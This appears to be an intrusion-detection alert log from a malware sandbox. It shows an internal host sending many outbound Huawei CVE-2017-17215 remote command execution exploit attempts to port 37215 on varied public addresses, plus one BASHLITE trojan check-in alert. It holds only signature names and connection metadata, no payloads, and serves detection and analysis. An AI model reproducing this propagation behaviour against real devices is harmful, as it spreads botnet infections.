                                            06/14/24-10:44:12.645993TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5369637215192.168.2.14156.143.130.201
                                            06/14/24-10:44:31.051967TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3491637215192.168.2.14156.219.93.209
                                            06/14/24-10:44:06.448974TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3697237215192.168.2.14197.218.197.139
                                            06/14/24-10:44:12.618233TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3363437215192.168.2.14156.101.154.179
                                            06/14/24-10:43:41.905964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5732837215192.168.2.14156.22.114.46
                                            06/14/24-10:44:26.997232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4614437215192.168.2.14156.247.189.194
                                            06/14/24-10:43:52.164042TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5634437215192.168.2.14156.95.161.193
                                            06/14/24-10:44:20.806813TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3399437215192.168.2.14197.168.123.149
                                            06/14/24-10:43:39.810168TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5819237215192.168.2.14156.134.53.157
                                            06/14/24-10:43:41.902300TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4111237215192.168.2.14156.242.150.91
                                            06/14/24-10:43:56.245783TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5313637215192.168.2.1441.7.174.148
                                            06/14/24-10:44:06.451624TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4551837215192.168.2.14197.40.161.102
                                            06/14/24-10:44:14.682015TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5681837215192.168.2.14197.209.238.42
                                            06/14/24-10:44:16.717996TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4214237215192.168.2.1441.1.191.211
                                            06/14/24-10:43:41.898097TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4129237215192.168.2.14197.44.120.76
                                            06/14/24-10:43:54.202206TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5295437215192.168.2.14197.172.126.247
                                            06/14/24-10:43:58.295287TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4492037215192.168.2.1441.179.144.88
                                            06/14/24-10:44:12.644886TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5459837215192.168.2.14197.50.203.251
                                            06/14/24-10:44:06.472556TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5569037215192.168.2.14156.168.184.78
                                            06/14/24-10:43:54.200501TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4165837215192.168.2.14197.117.171.250
                                            06/14/24-10:43:56.250434TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5419637215192.168.2.14156.43.56.143
                                            06/14/24-10:44:14.671207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6066837215192.168.2.14197.32.72.215
                                            06/14/24-10:44:16.718753TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5732037215192.168.2.14156.42.65.24
                                            06/14/24-10:43:45.989842TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4519837215192.168.2.1441.224.92.33
                                            06/14/24-10:43:41.846091TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5563037215192.168.2.14156.24.7.74
                                            06/14/24-10:44:24.916883TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4317637215192.168.2.14197.98.80.139
                                            06/14/24-10:44:26.986152TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5578437215192.168.2.14197.61.66.137
                                            06/14/24-10:44:24.917827TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5154837215192.168.2.1441.172.63.76
                                            06/14/24-10:44:00.344304TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4032037215192.168.2.14156.96.167.159
                                            06/14/24-10:44:29.833219TCP2840515ETPRO TROJAN ELF/BASHLITE Variant Reporting Arch Type (i586)4700223192.168.2.1443.231.232.101
                                            06/14/24-10:43:56.227336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3831437215192.168.2.1441.253.196.85
                                            06/14/24-10:44:08.501189TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5472637215192.168.2.14156.116.211.129
                                            06/14/24-10:43:41.905822TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3594237215192.168.2.14197.244.203.169
                                            06/14/24-10:44:29.011964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3973837215192.168.2.1441.199.85.9
                                            06/14/24-10:43:58.290981TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6076837215192.168.2.1441.213.204.126
                                            06/14/24-10:44:08.504591TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3426637215192.168.2.1441.166.125.160
                                            06/14/24-10:44:24.942406TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3721237215192.168.2.14197.74.129.11
                                            06/14/24-10:44:18.775984TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5840837215192.168.2.14156.180.222.98
                                            06/14/24-10:43:54.183350TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4925637215192.168.2.1441.236.19.76
                                            06/14/24-10:44:00.326075TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4377837215192.168.2.14156.77.74.218
                                            06/14/24-10:44:00.342950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4239037215192.168.2.14156.226.3.199
                                            06/14/24-10:43:37.762699TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4239837215192.168.2.14197.211.177.123
                                            06/14/24-10:44:20.807018TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5101437215192.168.2.14197.51.93.16
                                            06/14/24-10:43:58.277786TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5493437215192.168.2.1441.12.244.238
                                            06/14/24-10:44:08.504636TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3646037215192.168.2.1441.3.31.12
                                            06/14/24-10:43:58.294216TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4032237215192.168.2.14156.181.87.126
                                            06/14/24-10:44:06.451462TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4482637215192.168.2.14197.54.224.185
                                            06/14/24-10:44:06.452861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4064437215192.168.2.14156.195.143.148
                                            06/14/24-10:43:45.966779TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6040837215192.168.2.14197.145.170.70
                                            06/14/24-10:44:12.613897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4559637215192.168.2.14197.227.2.72
                                            06/14/24-10:44:22.878283TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4518637215192.168.2.14197.204.74.74
                                            06/14/24-10:44:31.088957TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4880037215192.168.2.14197.41.12.187
                                            06/14/24-10:44:08.502242TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5893837215192.168.2.14156.215.203.91
                                            06/14/24-10:44:04.411672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6084837215192.168.2.14156.180.229.206
                                            06/14/24-10:44:14.686462TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5651237215192.168.2.14197.62.221.220
                                            06/14/24-10:44:31.053043TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4864437215192.168.2.14197.184.100.208
                                            06/14/24-10:43:50.071285TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4412637215192.168.2.14156.74.76.176
                                            06/14/24-10:43:58.278049TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4222037215192.168.2.1441.79.118.71
                                            06/14/24-10:43:37.772579TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4139637215192.168.2.14197.142.220.142
                                            06/14/24-10:43:37.762013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5137237215192.168.2.1441.152.88.10
                                            06/14/24-10:44:00.339195TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4197237215192.168.2.14156.61.1.42
                                            06/14/24-10:43:56.243713TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5035037215192.168.2.14156.116.22.104
                                            06/14/24-10:43:39.791971TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4314237215192.168.2.14197.167.11.241
                                            06/14/24-10:43:50.111424TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4203237215192.168.2.14156.226.177.190
                                            06/14/24-10:44:26.980041TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5495837215192.168.2.14156.198.156.108
                                            06/14/24-10:44:08.504925TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5498837215192.168.2.14156.142.117.29
                                            06/14/24-10:44:31.051652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5973237215192.168.2.14197.7.130.42
                                            06/14/24-10:44:06.471822TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4762637215192.168.2.14197.231.239.9
                                            06/14/24-10:43:54.181537TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3843237215192.168.2.14156.29.3.2
                                            06/14/24-10:43:43.944112TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5727237215192.168.2.14197.53.234.207
                                            06/14/24-10:43:39.812290TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4748437215192.168.2.14197.133.122.60
                                            06/14/24-10:43:48.020534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4383837215192.168.2.1441.104.109.220
                                            06/14/24-10:44:06.453229TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4515037215192.168.2.14156.183.35.65
                                            06/14/24-10:43:56.246021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3975837215192.168.2.14156.215.244.40
                                            06/14/24-10:44:31.091447TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4153237215192.168.2.14197.219.222.35
                                            06/14/24-10:44:10.567434TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5125237215192.168.2.14156.137.207.94
                                            06/14/24-10:44:18.777722TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3618637215192.168.2.14156.236.115.29
                                            06/14/24-10:44:14.689041TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3797237215192.168.2.14156.220.123.232
                                            06/14/24-10:43:54.201773TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3673437215192.168.2.14197.157.81.33
                                            06/14/24-10:44:06.451741TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3906437215192.168.2.1441.101.141.132
                                            06/14/24-10:44:35.180815TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3310237215192.168.2.14156.188.57.40
                                            06/14/24-10:43:54.200040TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4835037215192.168.2.14197.147.193.49
                                            06/14/24-10:43:36.717805TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5131637215192.168.2.14156.240.147.158
                                            06/14/24-10:44:06.449449TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4247837215192.168.2.14156.3.144.27
                                            06/14/24-10:44:12.646314TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4996837215192.168.2.1441.184.68.200
                                            06/14/24-10:44:16.717626TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4398837215192.168.2.14156.89.152.37
                                            06/14/24-10:43:54.184012TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4308237215192.168.2.14156.232.228.134
                                            06/14/24-10:44:29.025431TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5478637215192.168.2.1441.194.7.24
                                            06/14/24-10:44:14.688942TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4720237215192.168.2.1441.144.78.172
                                            06/14/24-10:44:14.672102TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3301237215192.168.2.14197.221.91.69
                                            06/14/24-10:44:31.091579TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3635837215192.168.2.1441.233.134.244
                                            06/14/24-10:44:24.942098TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4431037215192.168.2.14156.203.128.109
                                            06/14/24-10:44:24.916915TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5746237215192.168.2.1441.159.180.18
                                            06/14/24-10:43:56.229219TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4974037215192.168.2.14156.129.223.101
                                            06/14/24-10:44:08.505285TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4605237215192.168.2.14197.221.151.85
                                            06/14/24-10:44:10.564635TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5255837215192.168.2.1441.154.45.161
                                            06/14/24-10:44:35.179576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5018437215192.168.2.14197.31.82.162
                                            06/14/24-10:44:14.684277TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4620637215192.168.2.14156.248.186.91
                                            06/14/24-10:44:18.761970TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4947237215192.168.2.1441.142.55.145
                                            06/14/24-10:44:08.501917TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3473437215192.168.2.1441.176.88.46
                                            06/14/24-10:44:26.980837TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3661637215192.168.2.14197.64.130.9
                                            06/14/24-10:44:12.641967TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3951637215192.168.2.1441.222.81.52
                                            06/14/24-10:44:31.057633TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5262837215192.168.2.14197.205.217.129
                                            06/14/24-10:43:52.163912TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3505437215192.168.2.14156.193.165.94
                                            06/14/24-10:44:02.369269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4802637215192.168.2.14197.217.53.197
                                            06/14/24-10:44:16.715309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3744037215192.168.2.14197.78.101.115
                                            06/14/24-10:43:48.016256TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4106637215192.168.2.14156.234.27.219
                                            06/14/24-10:44:22.881773TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4403837215192.168.2.14156.255.120.200
                                            06/14/24-10:43:52.165201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4296037215192.168.2.14156.190.185.170
                                            06/14/24-10:44:24.917863TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4684037215192.168.2.1441.10.207.10
                                            06/14/24-10:43:50.070349TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3552037215192.168.2.14156.235.60.164
                                            06/14/24-10:43:45.989628TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4167637215192.168.2.1441.99.41.77
                                            06/14/24-10:44:02.381198TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5513637215192.168.2.14156.153.68.109
                                            06/14/24-10:44:35.177623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3640437215192.168.2.1441.95.38.245
                                            06/14/24-10:43:45.967973TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4935637215192.168.2.1441.154.132.177
                                            06/14/24-10:44:00.322423TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3316837215192.168.2.14156.226.13.56
                                            06/14/24-10:44:12.641640TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4075637215192.168.2.14197.97.144.0
                                            06/14/24-10:44:14.687040TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6098437215192.168.2.14156.180.90.14
                                            06/14/24-10:44:06.471048TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3418037215192.168.2.1441.9.221.163
                                            06/14/24-10:43:39.807803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3653837215192.168.2.14197.14.34.11
                                            06/14/24-10:44:10.563429TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5713637215192.168.2.1441.206.232.39
                                            06/14/24-10:43:34.676197TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5698437215192.168.2.14197.111.198.15
                                            06/14/24-10:44:29.012155TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3712437215192.168.2.14156.200.252.56
                                            06/14/24-10:43:43.970844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4716437215192.168.2.14156.156.48.177
                                            06/14/24-10:43:54.185586TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3772637215192.168.2.14197.143.79.142
                                            06/14/24-10:44:12.646973TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4197637215192.168.2.14197.103.31.74
                                            06/14/24-10:44:14.684863TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3989037215192.168.2.14197.200.25.59
                                            06/14/24-10:44:10.548232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5671237215192.168.2.14197.165.9.53
                                            06/14/24-10:44:12.640861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3575237215192.168.2.1441.153.208.230
                                            06/14/24-10:44:33.151165TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4826637215192.168.2.14156.108.95.194
                                            06/14/24-10:44:16.715391TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5863237215192.168.2.1441.93.221.2
                                            06/14/24-10:44:16.715825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3626437215192.168.2.14197.47.115.219
                                            06/14/24-10:44:04.421203TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5745837215192.168.2.1441.86.176.206
                                            06/14/24-10:43:45.967363TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4943037215192.168.2.1441.66.130.46
                                            06/14/24-10:43:58.277855TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4949837215192.168.2.14197.152.125.124
                                            06/14/24-10:43:54.185459TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3587437215192.168.2.14197.73.150.12
                                            06/14/24-10:44:31.091491TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4443637215192.168.2.14156.156.50.209
                                            06/14/24-10:43:54.198638TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3731237215192.168.2.1441.166.185.34
                                            06/14/24-10:44:31.056143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4867437215192.168.2.14156.21.48.38
                                            06/14/24-10:44:31.056030TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4420437215192.168.2.14197.119.238.117
                                            06/14/24-10:43:36.702985TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5375437215192.168.2.1441.233.143.12
                                            06/14/24-10:43:56.229393TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3970637215192.168.2.14156.171.3.190
                                            06/14/24-10:44:16.718621TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5841637215192.168.2.14156.115.92.194
                                            06/14/24-10:43:48.017962TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5924637215192.168.2.1441.222.100.207
                                            06/14/24-10:43:50.073426TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5599237215192.168.2.14156.249.54.93
                                            06/14/24-10:44:20.806178TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5900637215192.168.2.1441.86.252.162
                                            06/14/24-10:44:31.051268TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4999637215192.168.2.14197.129.163.60
                                            06/14/24-10:44:18.775538TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5570637215192.168.2.14156.91.219.234
                                            06/14/24-10:43:43.944327TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4396037215192.168.2.1441.13.253.145
                                            06/14/24-10:44:35.183003TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3895437215192.168.2.1441.108.243.179
                                            06/14/24-10:44:12.646421TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5773837215192.168.2.1441.235.1.246
                                            06/14/24-10:44:16.717684TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3861437215192.168.2.14156.179.62.132
                                            06/14/24-10:43:48.034500TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4603637215192.168.2.1441.181.77.252
                                            06/14/24-10:44:12.641289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3542437215192.168.2.14197.242.129.142
                                            06/14/24-10:43:34.662112TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4791037215192.168.2.1441.181.77.39
                                            06/14/24-10:44:02.368771TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4133037215192.168.2.14156.69.237.49
                                            06/14/24-10:44:02.369216TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5132637215192.168.2.14156.71.235.101
                                            06/14/24-10:44:04.406694TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4772237215192.168.2.1441.103.13.39
                                            06/14/24-10:44:04.410693TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3573637215192.168.2.14156.211.251.248
                                            06/14/24-10:44:02.383695TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5218837215192.168.2.1441.50.89.108
                                            06/14/24-10:43:56.231018TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4086637215192.168.2.14156.19.87.158
                                            06/14/24-10:44:24.942623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4501637215192.168.2.14156.193.156.132
                                            06/14/24-10:44:20.828303TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3978037215192.168.2.1441.163.138.195
                                            06/14/24-10:43:39.790238TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4517837215192.168.2.1441.166.37.52
                                            06/14/24-10:43:43.943362TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4661637215192.168.2.1441.169.21.173
                                            06/14/24-10:43:39.791047TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5806837215192.168.2.14156.147.47.111
                                            06/14/24-10:43:58.277887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5574637215192.168.2.14156.125.86.225
                                            06/14/24-10:44:10.545205TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5494037215192.168.2.14197.204.194.130
                                            06/14/24-10:43:48.018758TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5957237215192.168.2.14197.177.151.17
                                            06/14/24-10:43:52.163143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5974437215192.168.2.14197.143.127.189
                                            06/14/24-10:43:54.185354TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3550237215192.168.2.1441.164.91.172
                                            06/14/24-10:43:54.182956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4469837215192.168.2.14197.136.30.37
                                            06/14/24-10:44:16.714977TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5077837215192.168.2.14156.235.110.38
                                            06/14/24-10:44:12.645698TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3809037215192.168.2.14197.250.132.188
                                            06/14/24-10:44:12.624398TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4678837215192.168.2.14197.70.177.19
                                            06/14/24-10:43:48.020687TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3989037215192.168.2.1441.62.107.245
                                            06/14/24-10:44:20.829276TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3435237215192.168.2.1441.242.111.248
                                            06/14/24-10:44:18.780073TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4432037215192.168.2.1441.19.178.111
                                            06/14/24-10:43:48.021960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3783637215192.168.2.14156.159.182.11
                                            06/14/24-10:43:45.968955TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4034237215192.168.2.14197.205.26.172
                                            06/14/24-10:44:24.913993TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4968037215192.168.2.1441.45.106.89
                                            06/14/24-10:43:56.228032TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4626437215192.168.2.14197.230.13.78
                                            06/14/24-10:44:12.617697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4027637215192.168.2.14197.254.154.136
                                            06/14/24-10:44:24.941567TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3506837215192.168.2.1441.143.223.162
                                            06/14/24-10:44:16.734384TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3694837215192.168.2.14156.108.193.115
                                            06/14/24-10:43:37.760034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4487437215192.168.2.1441.215.187.172
                                            06/14/24-10:44:20.806528TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4037837215192.168.2.14156.174.234.177
                                            06/14/24-10:43:41.897214TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4068637215192.168.2.14156.2.150.245
                                            06/14/24-10:43:43.972251TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5749037215192.168.2.1441.193.240.234
